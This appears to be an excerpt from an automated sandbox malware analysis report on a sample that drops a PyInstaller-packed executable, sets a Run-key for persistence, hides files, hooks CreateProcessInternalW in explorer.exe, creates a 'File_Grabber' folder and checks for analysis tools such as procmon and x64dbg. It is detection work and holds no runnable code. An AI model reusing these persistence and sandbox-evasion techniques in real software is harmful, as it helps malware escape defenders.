      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\libcrypto-1_1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l2-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-console-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\python38.dllJump to dropped file
      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1946.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140.dllJump to dropped file
      Source: C:\Users\user\Desktop\52kYJGCon6.exeFile created: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\libffi-7.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-util-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\ucrtbase.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\select.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile created: C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\miniwallet.bundle.js.LICENSE.txtJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile created: C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\notification_fast.bundle.js.LICENSE.txtJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Changes the view of files in windows explorer (hidden files and folders)
      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
      Found hidden mapped module (file has been removed from disk)
      Source: C:\Users\user\Desktop\52kYJGCon6.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH2200.TMP
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH4612.TMP
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TH6581.TMP
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5F
      Source: C:\Windows\explorer.exeCode function: 3_2_10A550E0 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_10A550E0
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Found evasive API chain (may stop execution after checking mutex)
      Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-19630
      Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-19630
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-19608
      Source: C:\Users\user\Desktop\52kYJGCon6.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-19610
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: svchost.exeBinary or memory string: PROCMON.EXE
      Source: svchost.exeBinary or memory string: PROCESSHACKER.EXE
      Source: svchost.exeBinary or memory string: X64DBG.EXE
      Source: svchost.exeBinary or memory string: AUTORUNS.EXE
      Source: 8D8EBC2422383023011859.exe.0.drBinary or memory string: %SYSTEMROOT%\SYSTEM32\SVCHOST.EXENTDLL%SYSTEMROOT%\SYSTEM32\MSIEXEC.EXE.RELOC%SYSTEMROOT%\SYSTEM32\AUDIODG.EXENTUNMAPVIEWOFSECTIONRBNSPGESYB.X64PROCESSHACKER.EXEPROCEXP.EXEPROCEXP64.EXETOTALCMD.EXEX64DBG.EXEIDAQ64.EXEIDAQ.EXEAUTORUNS.EXEPROCMON.EXESERVICESSVCHOST.EXEGQGWZDGQGWZD%08LX%04LX%LU\%08LX%04LX%LU\\.EXE\.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICESHIDDENSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCEDUNKNOWNEXPLORER.EXE
      Source: svchost.exeBinary or memory string: IDAQ.EXE
      Source: C:\Windows\explorer.exeCode function: 3_2_10A57E80 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,3_2_10A57E80
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4015Jump to behavior
      Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 4947Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9462Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\python38.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l1-2-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\libcrypto-1_1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-string-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l2-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-console-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-util-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\select.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
      Source: C:\Windows\System32\svchost.exeEvaded block: after key decisiongraph_5-19135
      Source: C:\Windows\System32\svchost.exeEvaded block: after key decision
      Source: C:\Windows\System32\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-20472
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_4-20459
      Source: C:\Users\user\Desktop\52kYJGCon6.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-20458
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-19599
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-18005
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-19597
      Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-19619
      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.4 %
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeAPI coverage: 1.7 %
      Source: C:\Windows\System32\svchost.exeAPI coverage: 5.4 %
      Source: C:\Windows\System32\svchost.exe TID: 3372Thread sleep count: 4015 > 30Jump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 3372Thread sleep time: -3814250s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 2180Thread sleep count: 311 > 30Jump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 2180Thread sleep time: -15550000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 4012Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 4460Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 3372Thread sleep count: 4947 > 30Jump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 3372Thread sleep time: -4699650s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1020Thread sleep time: -94620000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF7CA7979B0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7985A0 FindFirstFileExW,FindClose,6_2_00007FF7CA7985A0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF7CA7B0B84
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7985A0 FindFirstFileExW,FindClose,9_2_00007FF7CA7985A0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00007FF7CA7B0B84
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,9_2_00007FF7CA7979B0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,9_2_00007FF8B837303C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,9_2_00007FF8B8373280
